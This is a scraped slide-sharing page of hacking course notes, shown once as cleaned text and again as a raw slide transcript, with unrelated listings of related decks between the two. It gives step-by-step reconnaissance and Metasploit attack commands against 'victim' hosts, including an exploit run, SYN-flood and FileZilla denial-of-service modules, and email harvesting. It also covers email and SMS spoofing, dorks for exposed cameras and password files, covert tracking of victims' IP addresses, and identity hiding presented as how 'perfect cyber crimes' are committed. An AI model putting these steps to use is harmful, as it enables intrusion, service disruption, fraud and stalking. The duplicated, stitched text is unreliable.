The "Close window on exit" option should be set to Never.
Type HEAD / HTTP/1.0 and press Enter twice (the blank line ends the request).
You will get the victim's daemon banner as output.

HTTPRecon
http://www.computec.ch/projekte/httprecon/

Countermeasures:
Edit the default daemon message, ensuring critical information is not revealed.
Misguide the attacker by displaying false daemon banners.
Use a long false daemon banner and in the background record information about the
attacking client and try to trace him/her.
NetCat
Netcat is one of the most popular and widely used networking utilities on the internet. It
can be used to read and write network connections. It is widely used by both criminals
and system administrators.
Netcat is used for:
- Listening on a port
- Connecting to a port
- File transfer
- Chatting
- Executing applications
- Sending spoofed HTTP probes
- Proxy servers
- Port scanning, etc.
It is also used to probe a remote computer for open ports and the daemon/software
running on the open ports.
Netcat commands (command line tool):
nc -v www.altoromutual.com 80
HEAD / HTTP/1.0
(followed by a blank line)
Ncat is an improved, better version, which comes free with Nmap.
ncat -C www.altoromutual.com 80
GET / HTTP/1.0
(followed by a blank line; -C sends CRLF line endings as HTTP expects)

ncat -l 127.0.0.1 8080
opens a port on the local machine. Open a browser and type 127.0.0.1:8080/. Nothing
happens in the browser. In the command prompt, ncat managed to record some
information about the browser. This technique can be used to trace attackers.

Transferring files using ncat:

ncat -l 7000 > output.txt
(opens port 7000 and accepts input on it, which will be saved in output.txt)
ncat 127.0.0.1 7000 < input.txt

Operating System (OS) Detection

It is important for an attacker to determine what OS is running on the target system. The 2
most effective techniques are:
Active fingerprinting
Passive fingerprinting
Different OSes have different TCP/IP stacks. Hence, different OSes respond differently to the
same packet sent to them by the same system. This difference in response is used as a
benchmark for differentiating between various operating systems.

Active fingerprinting: is the process of actively sending data packets to the target
system to generate a response, which is then analyzed and compared to the list of
known responses to determine the OS running on the target system. Typically, while
analyzing responses, the following fields & techniques can be useful:

TCP initial window size of packets
TTL values
ACK values of packets
Initial Sequence Number (ISN) values
Handling of overlapped fragments, etc.
The attacker can be traced. That means this method is not anonymous.
Nmap commands:-
nmap -O -v www.altoromutual.com
nmap -A -v www.altoromutual.com

Passive Fingerprinting

The problem with active fingerprinting is that it reveals the identity of the criminal.
http://lcamtuf.coredump.cx/p0f3/
p0f will try to determine the OS information by simply analyzing the data packets sent
by the target system while performing usual and routine communication, e.g. if the target
visits your website, sends you a file, etc.
p0f -L (list the available interfaces)
p0f -i 4 (interface number)
The TTL, window size, DF bit and TOS fields in the reply TCP packet are analyzed to get the
remote OS.

OS Detection Countermeasures

Change the default values of your OS like TTL, ISN, etc.
Mislead the attacker by configuring the default values of some other OS on your system.
Use ACLs to filter out unwanted probing packets.

Security Auditing

It is a technique of scanning the victim computer for any potential security loopholes
that may exist on it, using which an attacker can hack into it.
Tools: Nessus, GFI Languard, Retina Scan, SAINT, Core Impact, NSAuditor (Not
Free)


Attacking the target computer using METASPLOIT

In my previous blog, I have covered detailed step by step instructions on how to
collect maximum information about the victim in pursuit of getting any possible weak
entry points. These are popularly called vulnerabilities. Once you get any possible
loopholes or vulnerabilities, it is the perfect time to ATTACK!!!

Metasploit is an open source framework for penetration testing that allows you to test
the security of a network. It has a built-in database of hundreds of known
loopholes and vulnerabilities for various platforms and software. It allows you to
automatically test a remote system for all these hundreds of security loopholes.
EXPLOIT: is code, software or a tool that misuses a vulnerability or loophole on a
remote machine to cause malicious results on it.
PAYLOAD: is defined as the effect of executing the exploit code and some other
payload code on a remote machine, which allows a medium of communication to be
established between the attacker and the victim. It could be in the form of
modification/deletion of data, getting shell access, file access and others.
Each EXPLOIT will support certain types of PAYLOADS.

STEPS INVOLVED
1. Identify a loophole on the victim using network reconnaissance, security auditing and
   penetration testing.
2. Select and configure that exploit and the various exploit options in Metasploit.
3. Select the victim computer and victim port.
4. Select the payload you wish to launch with the exploit code.
5. Launch the attack.
Metasploit commands:
>help
>banner
>connect www.altoromutual.com 80
  GET / HTTP/1.0
>ping www.altoromutual.com
>show exploits
>show payloads
>show auxiliary
>search type:exploit platform:windows unsafe
>info windows/tftp/quick_tftp_pro_mode
>use windows/tftp/quick_tftp_pro_mode
windows/tftp/quick_tftp_pro_mode>show options
windows/tftp/quick_tftp_pro_mode>set RHOST altoromutual.com
windows/tftp/quick_tftp_pro_mode>check
windows/tftp/quick_tftp_pro_mode>exploit
windows/tftp/quick_tftp_pro_mode>back (exit a module)

Port scanning using Metasploit
It is possible to port scan a remote computer using Metasploit. All nmap
commands are valid in Metasploit.
>search portscan
>use auxiliary/scanner/portscan/tcp
>use auxiliary/scanner/portscan/syn (SYN port scan)
>use auxiliary/scanner/portscan/xmas (XMAS port scan)
>use auxiliary/scanner/portscan/ack (ACK port scan)
>show options
>set RHOSTS www.victim.com
>set PORTS 1-100
>set VERBOSE true
>run
>nmap -sT -p 1-100 -Pn www.victim.com

Daemon banner grabbing using Metasploit
>use auxiliary/scanner/pop3/pop3_version
>set RHOSTS www.victim.com
>run
Similarly,
>use auxiliary/scanner/http/http_version
>set RHOSTS www.victim.com
>run
>use auxiliary/scanner/smtp/smtp_version
>set RHOSTS www.victim.com
>run
(SMTP runs on port 25, port 80 is HTTP and port 110 is POP3)

Grabbing email addresses from a website
>search collector
>use auxiliary/gather/search_email_collector
>show options
>set DOMAIN www.victim.com
>run

TCP flooding using Metasploit
It is possible to execute a DoS attack against various victims using Metasploit.
>use auxiliary/dos/tcp/synflood
>set RHOST www.victim.com
>run

FileZilla is a popular FTP server for the Windows platform. There are 2 modules
in Metasploit that can be used to execute a DoS attack against some
versions of the FileZilla server:

>use auxiliary/dos/windows/ftp/filezilla_admin_user
>set RHOST www.victim.com
>run

>use auxiliary/dos/windows/ftp/filezilla_server_port
>set RHOST www.victim.com
>run
Disposable email (anonymous): www.hidemyass.com.
Email spoofing: is the art of sending a spoofed email from somebody else's email account.
www.anonymizer.in/fake-mailer

SMS spoofing: (paid service, but may be worth it)
http://www.spranked.com/
http://www.phonytext.com/
Call spoofing: http://www.mobivox.com
Google Dorks
Google Hacking or Google Dorking is the use of clever Google search tags or commands to
try and reveal sensitive data about victims like password files, vulnerable servers and others.
A Google dork, in hacker slang, is somebody whose sensitive data is revealed
with the use of Google Hacking or Google Dorking.
Examples:
info:<web address>
cache:www.facebook.com password (retrieve old cached copy of webpage)
link:www.flyingmachine.co.in
allintitle:Login
allintitle:Login+site:timesofindia.com
allinurl:password login
allinurl:password login+site:www.google.com
inurl:/view.index.shtml (access live cameras)
inurl:/view.indexFrame.shtml Axis
ext:pdf hacking
site:gov inurl:admin login
site:in inurl:admin login
intitle:intranet inurl:intranet+site:in
“Welcome to phpMyAdmin” AND “Create new database”
“index of /etc/passwd”

Google Hacking Database (GHDB)
http://www.hackersforcharity.org/ghdb/

Website Mirroring

Más contenido relacionado

La actualidad más candente

Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
guest441c58b71
 
WIFI; making a wireless connection
WIFI; making a wireless connectionWIFI; making a wireless connection
WIFI; making a wireless connection
Webster University
 
Z wave controller z-box quick start guide
Z wave controller z-box quick start guideZ wave controller z-box quick start guide
Z wave controller z-box quick start guide
Domotica daVinci
 

La actualidad más candente (15)

Ip address
Ip address Ip address
Ip address
 
Reconnaissance & Scanning
Reconnaissance & ScanningReconnaissance & Scanning
Reconnaissance & Scanning
 
Easy IP Addressing and Subnetting Manual for Starters
Easy IP Addressing and Subnetting Manual for StartersEasy IP Addressing and Subnetting Manual for Starters
Easy IP Addressing and Subnetting Manual for Starters
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking
 
WIFI; making a wireless connection
WIFI; making a wireless connectionWIFI; making a wireless connection
WIFI; making a wireless connection
 
What is an ip address
What is an ip addressWhat is an ip address
What is an ip address
 
Lecture9
Lecture9Lecture9
Lecture9
 
Ceh v5 module 10 session hijacking
Ceh v5 module 10 session hijackingCeh v5 module 10 session hijacking
Ceh v5 module 10 session hijacking
 
Reconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awarenessReconnaissance - For pentesting and user awareness
Reconnaissance - For pentesting and user awareness
 
Z wave controller z-box quick start guide
Z wave controller z-box quick start guideZ wave controller z-box quick start guide
Z wave controller z-box quick start guide
 
Ip address classes
Ip address classesIp address classes
Ip address classes
 
Ceh v5 module 04 enumeration
Ceh v5 module 04 enumerationCeh v5 module 04 enumeration
Ceh v5 module 04 enumeration
 
Chapter04 ip addressing networking
Chapter04 ip addressing networkingChapter04 ip addressing networking
Chapter04 ip addressing networking
 
Ceh v5 module 21 cryptography
Ceh v5 module 21 cryptographyCeh v5 module 21 cryptography
Ceh v5 module 21 cryptography
 

Similar a Hacking

adhoc network workshop
adhoc network workshopadhoc network workshop
adhoc network workshop
Ali Nezhad
 
Basic networking concept1
Basic networking concept1Basic networking concept1
Basic networking concept1
reddydivakara
 

Similar a Hacking (20)

Ip addressing upload
Ip addressing uploadIp addressing upload
Ip addressing upload
 
Cyber security and ethical hacking 3
Cyber security and ethical hacking 3Cyber security and ethical hacking 3
Cyber security and ethical hacking 3
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Ip address
Ip addressIp address
Ip address
 
IBPS SO
IBPS SOIBPS SO
IBPS SO
 
adhoc network workshop
adhoc network workshopadhoc network workshop
adhoc network workshop
 
Ip address and subnet masking final
Ip address and subnet masking finalIp address and subnet masking final
Ip address and subnet masking final
 
Konsep pembangunan tapak web & laman web
Konsep pembangunan tapak web & laman webKonsep pembangunan tapak web & laman web
Konsep pembangunan tapak web & laman web
 
Understanding computer networks
Understanding computer networksUnderstanding computer networks
Understanding computer networks
 
Lecture5_IP_NAT.ppt
Lecture5_IP_NAT.pptLecture5_IP_NAT.ppt
Lecture5_IP_NAT.ppt
 
Lecture5_IP_NAT.ppt
Lecture5_IP_NAT.pptLecture5_IP_NAT.ppt
Lecture5_IP_NAT.ppt
 
Lecture5_IP_NAT.ppt
Lecture5_IP_NAT.pptLecture5_IP_NAT.ppt
Lecture5_IP_NAT.ppt
 
News bytes Sept-2011
News bytes Sept-2011News bytes Sept-2011
News bytes Sept-2011
 
Ip addresses
Ip addressesIp addresses
Ip addresses
 
Digital network lecturer2
Digital network  lecturer2Digital network  lecturer2
Digital network lecturer2
 
ffuyu yguyguyg.pptx
ffuyu yguyguyg.pptxffuyu yguyguyg.pptx
ffuyu yguyguyg.pptx
 
Hyperlink
HyperlinkHyperlink
Hyperlink
 
Ip address
Ip addressIp address
Ip address
 
Asas Pelayaran Internet
Asas Pelayaran InternetAsas Pelayaran Internet
Asas Pelayaran Internet
 
Basic networking concept1
Basic networking concept1Basic networking concept1
Basic networking concept1
 

Hacking

  • 1. is a hacker ? A Hacker is NOT a criminal A hacker is Somebody who thinks outside the box. Wants to test his limits Wants to try things that are not in the manual Has unlimited curiosity Discovers unknown features about technology Dedicated to knowledge Beleives in stretching the limits Highly creative Hackers vs. Crackers Hackers Crackers Very knowledgeable Good guy Bad guy Help improve security Want to cause cyber destruction Strong ethics No ethics Have prior permission No prior permission Job opportunities: Banking, Telecom, IT/IteS/BPO/KPOs, ecommerce, military, police, retail industry, etc. Hacking into a computer is just like breaking into a house. Steps of a hacker: 1. Identify the victimInformation Gathering 2. Find a loophole/network reconnaissance 3. Actual attack/hack/break in 4. Escape without a trace Identify the victim:- Anatomy of an IP address:- An IP address is something anologous to your mobile phone number. It is something which uniquely identifies your presence on the internet. It is a 32-bit address which is divided into four fields of 8-bit each containing numbers betwen 1 and 255. By simply studying an IP address, we can easily reveal a lot of information about the network the victim belongs to. Different classes of an IP address Class Range Network/Host IDs A 0.0.0.0 to 126.255.255.255 NETWORK.HOST.HOST.HOST B 128.0.0.0 to NETWORK.NETWORK.HOST.HOST 191.255.255.255 C 192.0.0.0 to NETWORK.NETWORK.NETWORK.HOST 223.255.255.255 D 224.0.0.0 to Multicast IP addresses. They are IP addresses set 239.255.255.255 aside for special purposes E 240.0.0.0 to Not in use 255.255.255.255 XX.YY.AA.BB network ID host ID Class A: XXX YY.AA.BB
  • 2. Class B: XXX.YY AA.BB Class C: XX.YY.AA BB Special IP addresses: Use IP address Local loopback address 127.0.0.1 Private IP Address: to be used for computers Class A Network inside a private network or LAN 10.0.0.0 – 10.255.255.255 Class B Network 172.16.0.0 – 172.31.255.255 Class C Network 192.168.0.0 – 192.168.255.255 Converting IP addresses into different formats: Format IP Address Decimal 171.67.215.200 Binary 10101011.01000011.11010111.1001000 Octal 253.103.327.310 Hexadecimal 00AB.0043.00D7.00C8 http://www.csgnetwork.com/ipaddconv.html Windows Scientific calculator Tracking victim IP address www.spypig.com – use to find out the IP address of the victim via sending a tracking image to victim„s email id. http://www.getnotify.com/ http://didtheyreadit.com/ http://www.politemail.com/ - commonly used in corporate world http://readnotify.com/ - creates tracking file like a word or pdf file. How to trace an email back to its sender ? 1st technique:- Step 1: Open email headers (Show original option in gmail. In yahoo. Email settings->full headers) Step 2: Analyze email headers Manually (the headers contain IP address) or automatically (2nd technique)using emailtrackerpro (http://www.emailtrackerpro.com/) 3rd technique:- http://blasze.com/iplog/ Simply send a crafted link to your friend Now we have ORIGINAL URL and VICTIM URL DISGUISED URL: using URL shortening website s www.bit.ly www.goo.gl 4th technique: www.whatismyipaddress.com How to find out victim„s IP address using a website ? Step 1: create your own website/webpage/blog Step 2: in the homepage, write a java code to extract IP address and MAC address of victim Step 3: Invite the victim(s) 5th technique: Using chatting software (not a reliable technique though) Setup a chat with victim and put the below command in dos prompt- netstat –n 6th technique:- TCPView Software http://technet.microsoft.com/en- us/sysinternals/bb897437.aspx Currports http://www.nirsoft.net/utils/cports.html
  • 3. How to trace an IP address to exact geographical location ? http://visualroute.visualware.com/ NeoTrace pro http://neotrace-pro.en.softonic.com/ 3d traceroute http://www.d3tr.de/ loriot pro http://www.loriotpro.com/ geospider http://oreware.com/viewprogram.php?prog=22 http://vtrace.pl/ All are online versions of the simple traceroute command Ex: tracert www.indiatimes.com Trace a mobile phone number to its geographical location http://trace.bharatiyamobile.com/ Tracking stolen smartphone https://www.lookout.com/ create a lookout account and register your device. Summary - What to do to be a hacker - What is IP address - How to get somebody„s IP address - How to trace the IP address„s exact geographic location - How to track a mobile phone - How to trace a lost smartphone Internal and External IP addresses Introduction to NAT (Network Address Translation) When the internet was initially created, there was no shortage of any IP addresses. However, as internet usage spread, an acute shortage of IP addresses was created worldwide This led to emergence of Network Address Translation. Advantages of NAT are- It Reduces need for IP addresses, Improves security and Easier implementation of networks In a NAT system, nobody from outside world will know IP address of an internal system. - Identity is protected - No direct connection
  • 4. In a NAT enabled system, a person from outside, first have to hack into the router before trying to get into the internal system. Depending upon the entension number entered, the lookup table is used to route the call to the appropriate internal system. How to find out internal IP address & external IP address ? Internal IP address can be found using netstat –n ipconfig /all External IP address can be found on http://whatismyipaddress.com/ How to hide your IP address ? by using a proxy server http://www.anonymizer.ru – online tool/web proxy Most of the russian proxy websites are free None of them maintain any record or log files http://samair.ru/proxy/ http://www.hidemyass.com/ - uses URL encoding so that ”facebook” does not appear on URL Torrents:- How torrents are blocked ? - Disabling torrent clients Solution- http://www.bitlet.org/ - Block download of .torrent extension files Solution- http://www.torrent2exe.com/ http://txtor.dwerg.net/ The perfect cyber crimes are commited by effectively hiding your presence on the internet. Your presence on the internet can be spoofed or tricked by hiding your IP address as well as by hiding your system„s MAC address plus with a lethal technique called war driving. 
Difference between IP address and MAC address IP address MAC address Given by ISP/Network Given by manufacturer and it is static 2 types- static IP address and dynamic IP Your hardware Network Interface Card (NIC) address like ethernet card, wifi card, bluetooth, etc has its unique MAC address DOS command to get your internal IP DOS command to get their respective MAC address is– addresses is Ipconfig /all getmac To get your external IP address, open your web browser and goto http://whatismyipaddress.com/ The perfect cyber crimes are commited by- Proxy bouncing – IP hiding or IP spoofing (Ultrasoft) MAC spoofing – (MACAddressChanger, MacMakeUp-doesnt work on windows XP, MadMacs, EtherChange, BWmachak) War driving – driving on the streets with a laptop and scan for unprotected Wifi networks (inssider, Netstumbler, Kismet, Airsnort and War Chalking) Onion routing protocol – provides anonymous, secure, encrypted access to the internet. Ex- TOR
  • 5. How TOR is better than proxy servers ? TOR is available as free download from http://www.torproject.org.in/ How to unblock TOR ? - Change the name of the downloaded TOR exe file - In the TOR„s proxy settings, change the default port number - Add bridge relay server URLs to TOR from https://bridges.torproject.org/ Bridge relays (or "bridges" for short) are Tor relays that aren't listed in the main directory. Since there is no complete public list of them, even if your ISP is filtering connections to all the known Tor relays, they probably won't be able to block all the bridges. Incase https://bridges.torproject.org/ is blocked, another way to find public bridge addresses is to send mail to bridges@torproject.org with the line "get bridges" by itself in the body of the mail. However, so we can make it harder for an attacker to learn lots of bridge addresses, you must send this request from an email address at one of the following domains: gmail.com yahoo.com Types of Proxy servers – SOCKS and HTTP HTTP proxy servers – allow you to bypass filtering mechanisms and access blocked content. User sends HTTP request to proxy server, who then reads the Host header in the HTTP request, connects to the target server and transmits back whatever data the server sends back. Usually, it works only with HTTP apps. Ex:- anonymizer.com SOCKS proxy servers allows you to bypass filtering mechanisms and access blocked content. SOCKS is a protocol that transmits data between source and destination cia a proxy server without reading any of the contents. Hence it works with all protocols like TCP, UDP, etc. And will allow you to use all applications (like mail, browsing, downloading files, etc.) . Ex- TOR TOR works on port number 9051. Using TOR, you can hide yourself in skype or any other instant messenger, There are 2 ways to do this- - Connect the application to TOR - Connect the application to a proxy
  • 6. - Both cases requires an IP address and port number. Goto skype tools options connection settings  proxy Give proxy IP as 127.0.0.1 and port number 9051. Tools:- Multiproxy (http://multiproxy.org/multiproxy.htm) – allows you to keep proxies all in the same session. It supports both HTTP and SOCKS. You just need to feed this software with the proxy servers. SOCKSCHAIN http://ufasoft.com/socks/ Connects you to a chain of SOCKS or HTTP proxies (Proxy bond) ProxyFire http://www.proxyfire.net/ Ultrasurf https://ultrasurf.us/ - Anonumous browsing from your pendrive. It encrypts connection, hides your IP and unblocks stuff. You can even configure a proxy inside ultrasurf if your college/organization requires a proxy server to connect to. Virtual Private Network (VPN) A VPN is a group of computers connected privately through a public network like Internet. Usually VPN services gives you an encrypted, secure and anonymous communication channel. Popular VPN services are:- HideMyAss, IPVanish, StrongVPN, BoxVPN, 12VPN and GoTrusted. VPN is like a proxy but in a private network. If Ultrasulf/SOCKS or proxy services doesn„t work as expected, a VPN service is used. VPN servers, like proxy servers can be in different parts of the world. Theseservers provide better spped than proxy servers VPNs are used to access blocked videos in Internet. Ex:- http://www.hidemyass.com/vpn/ HTTP Tunneling Assume that inside your network, FTP, some websites/torrents are blocked by your firewall. But no firewall blocks all traffic. HTTP tunneling disguises blocked sites as regular/allowed http traffic. Let us assume that in your college/company, FTP protocol (port 21) is blocked or torrents are blocked. The firewall only allows HTTP traffic on port 80, all other ports are blocked. It is possible to encapsulate FTP or torrent traffic inside HTTP protocol and bypass the firewall. Step 1:- Install HTTP tunneling software server on your home or outside computer that has unrestricted access. 
Step 2:- Install HTTPTunneling software client on your college/office computer that has restricted access. Step 3:- Now your connection diagram is as follows YOU FTP or torrent software HTTP Tunneling client  sends FTP or torrent traffic encapsulated into HTTP protocol via port 80 to bypass firewall  HTTP Tunneling server on Home Computer  FTP or Torrent Destination
  • 7. Now you can use college computer to access everything on your home network including unrestricted internet. Ex:- Tunnelizer, HTTPort and HTTPTunnel are good HTTPTunneling tools. Super Network Tunnel (http://www.networktunnel.net/) is a commercial tool to perform 2 way HTTP Tunneling Home networkcollege network Some cool stuffs:- PSIPHON (http://psiphon.ca/) Proxy workbench (http://proxyworkbench.com/) Reverse text:- http://www.textmechanic.com/ Upside down text (http://www.upsidedowntext.com/) Proxy Workbench (http://proxyworkbench.com/) People Hacking:- Whatever we do online are tracked in some website. http://www.pipl.com/ http://www.spokeo.com/ http://www.anywho.com/ http://www.intelius.com/ google maps street view google earth satellite view Network reconnaissance and Information gathering 2nd step to hacking Network reconnaissance is the process of finding out as much information about victim as possible. Typically an attacker is trying to find out the following about the victim- - Victim is online/offline - Network topography - DNS information - List of open ports - DNS information - Names and versions of software running open ports - OS details - Possible security loopholes Techniques:- PING sweeping, Traceroute DNS related tools LAN surveyors Port scanning Daemon Banner Grabbing OS fingerprinting Security Auditing
  • 8. How to execute the attack Ping sweeping Ping is used to check the connectivity between your computer and the remote computer (whether you are online, whether victim is online and whether there is connectivity between both of you) Ping is used for Denial of Service (DoS) attacks, OS and firewall detection purposes. Popular sweeping tools are nmap (http://nmap.org/) http://ping.eu/ Ping using Nmap:- nmap –sn –v www.google.com (-sn means No port scan) Ping by bypassing firewall nmap –sn –v –Pn www.google.com Instead of using ICMP echo requests, it connects to port 80 -sn === perform ping. -v == verbose mode (gives you detailed information about what it is doing) ICMP echo requests/replies can easily be blocked by a firewall. Hence, -Pn option attempts to connect to the website or port 80 of www.google.com Ping sweeping allows you to ping entire range of computers nmap –sn –v 203.94.1.0-255 Angry IP scanner – ping sweeping tool Traceroute When data packets travel from source to destination system, then they do not always take the same path, Traceroute is a tool that allows you to trace a path between two systems. Originally it was designed for network troubleshooting but commonly used for - OS detection - Firewall detection - Network topology information - Geographical location of the target system How to guess the Operating system running on a remote computer by simply using PING and TRACEROUTE ? Time to live (TTL) is a mechanism that limits the lifespan or lifetime of data in a computer or network. TTL value gets reduced by one everytime data packet reaches a router. The initial TTL value is determined by the operating system. If I am able to find out the initial TTL value of a data packet sent by the victim, I can guess the operating system running on the victim Different Operating systems have different TTL values. Final TTL value = Initial TTL value-No. 
of routers Steps to know what OS www.altoromutual.com is running (it is legal to hack this URL) Step 1:- E:Documents and SettingsSYS>ping www.altoromutual.com Pinging altoromutual.com [65.61.137.117] with 32 bytes of data: Reply from 65.61.137.117: bytes=32 time=290ms TTL=117 Reply from 65.61.137.117: bytes=32 time=290ms TTL=117 Reply from 65.61.137.117: bytes=32 time=289ms TTL=117 Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
  • 9. Ping statistics for 65.61.137.117: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 289ms, Maximum = 290ms, Average = 289ms Inference:- Final TTL value = 117 117 = Initial TTL value – No. of router hops Step 2:- E:Documents and SettingsSYS>tracert www.altoromutual.com Tracing route to altoromutual.com [65.61.137.117] over a maximum of 30 hops: 1 <1 ms <1 ms <1 ms 192.168.1.1 2 22 ms 23 ms 25 ms ABTS-KK-Static-001.228.178.122.airtelbroadband.i n [122.178.228.1] 3 20 ms 21 ms 21 ms ABTS-KK-Static-217.32.166.122.airtelbroadband.in [122.166.32.217] 4 20 ms 21 ms 21 ms AES-Static-025.102.22.125.airtel.in [125.22.102. 25] 5 185 ms 178 ms 176 ms 125.62.187.189 6 177 ms 178 ms 178 ms ldn-b2-link.telia.net [213.248.71.17] 7 177 ms 178 ms 178 ms ldn-bb2-link.telia.net [80.91.247.26] 8 290 ms 291 ms 291 ms nyk-bb2-link.telia.net [80.91.248.254] 9 * * * Request timed out. 10 * 290 ms 288 ms rackspace-ic-127247-dls-bb1.c.telia.net [213.248 .88.174] 11 290 ms 289 ms 291 ms coreb.dfw1.rackspace.net [74.205.108.52] 12 291 ms 291 ms 291 ms core5.dfw1.rackspace.net [74.205.108.27] 13 290 ms 294 ms 289 ms 67.192.56.19 14 291 ms 289 ms 289 ms 65.61.137.117 Trace complete. E:Documents and SettingsSYS> Inference:- Count the number of hops. Eliminate 1st entry (which is source) and last entry (which is destination) and do not count request timeouts. = 11 router hops Final TTL value = 113 No. of router hops = 11 117 = Initial TTL value – 11 Initial TTL value = 128 Step 3:- Now google search for default TTL values of different Operating Systems. From the URL, http://www.binbert.com/blog/2009/12/default-time-to-live-ttl-values/ TTL value 128 corresponds to some windows based operating system running on victim (www.altoromutual.com) Domain Name Server A DNS lookup is a query sent by a user (browser or IM or email client) to a DNS server to convert a particular domain name to its respective IP address. 
www.whois.net www.iptools.com www.betterwhois.com
  • 10. www.dnsstuff.com www.dnstools.com www.zoneedit.com/lookup.html Port Scanning:- Port scanning is the art of scanning a remote target system to obtain a list of open virtual ports on it that are listening for connections. This is usually one of the first few steps every criminal takes. Popular port scanning tools: nmap, strobe, superscan, etc. It allows a criminal to identify any potential entry points into a target computer. The followind covers how to see open ports on some remote computer. Popular Ports:- 21 FTP 23 Telnet 25 SMTP 53 DNS 80 HTTP 110 POP3 443 SSL/https 513 rlogin TCP Packet format:- Flag Types – SYN == Start a new connection FIN == End a connection existing RST == Error Notification ACK == Data Received Successfully How are connections established on the Internet ? 3 Step/3 Way TCP/IP Handshake (===== > meaning sends) Step 1: Client (me)===== > SYN Packet ====== > Host (Google) Step 2: Host ======== >SYN/ACK Packet====== > Client Step 3: Client ======= > ACK Packer ==== > Host Hoe are connections terminated ? 2 steps:-
  • 11. Step 1: Client === > FIN Packet ===== > Host Step 2: Host == > ACK Packet ===== > Client (Reverse also needs to happen) It is possible to create your own packets using colasoft packet builder (Packet Generator) and Komadia Packet Crafter which is available as free download on the internet. TCP CONNECT Port Scan/ TCP Handshake Port Scan:- Port scan establishes a full 3-way TCP/IP Handshake with all ports on the remote system. Procedure:- ATTACKER sends SYN Packet to TARGET OPEN:- TARGET sends back a SYN/ACK Packet CLOSED:- TARGET sends back a RST/ACK Packet ATTACKER sends ACK/RST Packet back to TARGET Advantages:- Very accurate, no countermeasures Disadvantages:- Attacker is Easily Detected/caught Nmap command:- nmap –sT –p1 – 100 –Pn www.altoromutual.com -sT TCP Connect Port Scan -p Port Range Second type of scan where detection is difficult is 1) TCP SYN Port Scan/Half Open Scan/Stealth Scan. Also known as Half Open scan because only half of the complete 3-way TCP/IP handshake is executed. ATTACKER sends SYN Packet to TARGET OPEN: TARGET sends back a SYN/ACK Packet No Third Step (Unlike previous scan). Considered stealth. Can be detected using PortSentry on Unix platform (http://sourceforge.net/projects/sentrytools/) nmap –sF –p1-100 –Pn www.altoromutual.com NULL/XMAS Port Scan – Stealth but unreliable and varied responses nmap –sX –p1-100 www.altoromutual.com (all flags set as 1) nmap –sN –p1-100 www.altoromutual.com (all flags set as 0) 2) IDLE Port Scan (Blind Port Scanning): Very useful for attacker It port scans the victim without sending even a single packet to the victim from own IP address. Every system has fragment ID number which is a 4 digit number that is increased by 1 each time a packet is sent by it. Step 1: Probe a zombie machine for their fragment ID. ATTACKER ===== > sends SYN/ACK packet ======= > ZOMBIE ZOMBIE ======= > sends back a RST packet with Fragment ID ==== > ATTACKER Assume recorded fragment ID = 1012. 
Step 2: Send spoofed SYN Packet from zombie to victim OPEN: Victim sends SYN/ACK to Zombie. Zombie sends back a RST and increased its fragment ID by 1 and becomes 1013. CLOSED: Victim sends RST to Zombie who discards RST packet and does not change its fragment ID.
  • 12. Step 3: Probe the fragment ID of Zombie again. If fragment ID increased by 1, then port on victim is open, else it is closed. nmap –Pn –p 1-100 –sI <ZOMBIE/Friend‟s IP address> www.altoromutual.com -sI == > idle port scan 3) ACK Port Scan/Firewall detection scan Nmap –sA –pN –p 1-100 www.altoromutual.com This type of scan can be used to determine presence of a firewall filtering out data packets. ATTACKER sends ACK packet to TARGET FIREWALL PRESENT: No response FIREWALL NOT PRESENT: Target sends back RST Packet. Other command line port scanning tool: scanline, hping3, etc. Countermeasures: - Foolproof countermeasures against port scanning do not exist. - Close as many ports as possible. - Filter out certain packets using firewalls, ACLs and other filters using tools like Scanlogd, BlackICE, Abacus, Portsentry, snort, etc. Daemon Banner Grabbing It helps you confirm your guess about the victim Operating System. Once you get to know list of installed software on victim system, the attacker google searches for installed software vulnerabilities. Daemon banner grabbing: It is the process of getting useful information about the target system by recording the welcome banners of the daemons running on various ports. It can be used to get the following information about the target system o Daemon name and version number o OS information o Most important, to identify possible points of entry nmap –sV –p 1-100 www.altoromutual.com Scanline:- sl –v –bt 1-100 www.altoromutual.com Manual technique using Putty (Telnet client) Telnet to port 80 of victim Close window on exit option should be set as never Type HEAD/HTTP/1.0 and press enter. You will get the victim‟s daemon banner as output. HTTPRecon http://www.computec.ch/projekte/httprecon/ Countermeasures: Edit default daemon message ensuring critical information is not revealed. Misguide attacker by displaying dales daemon banners. 
Use a long false daemon banner and in the background record information about the attacking client and try to trace him/her.
  • 13. NetCat Netcat is one of the most popular and widely used networking utilities on the internet. It can be used to read and write network connections. It is widely used by both criminals and system administrators. Netcat is used for- - Listening to a port - Connecting to a port - File transfer - Chatting - Executing applications - Sending spoofed HTTP probes - Proxy servers - Port scanning, etc. It is also used to probe a remote computer for open ports and daemon/software running on the open ports. Netcat commands (command line tool): nc –v www.altoromutual.com 80 HTTP/1.0 Ncat is improved, better version, which comes free with Nmap. ncat –C www.altoromutual.com 80 get http/1.0 ncat –l 127.0.0.1 8080 opens a port on local machine. Open browser and type 127.0.0.1:8080/ Nothing happens in the browser. In the command prompt, ncat managed to record some information about browser. This technique can be used to trace attackers. Transferring files using ncat: ncat –l 7000 > output.txt (opens port 7000 and accepts input on it, which will be saved in output.txt) Ncat 127.0.0.1 7000 <input.txt Operating System (OS) Detection It is important for an attacker to determine what OS is running on the target system. 2 most effective techniques are- Active Fingerprinting Passive Fingerprinting Different OS have different stacks. Hence, different OS responds differently to the same packet sent to it by same system. This difference in response is used as a benchmark of differentiating between various operating systems. Active Fingerprinting: is the process of actively sending data packets to the target system to generate a response, which is then analyzed and compared to the list of
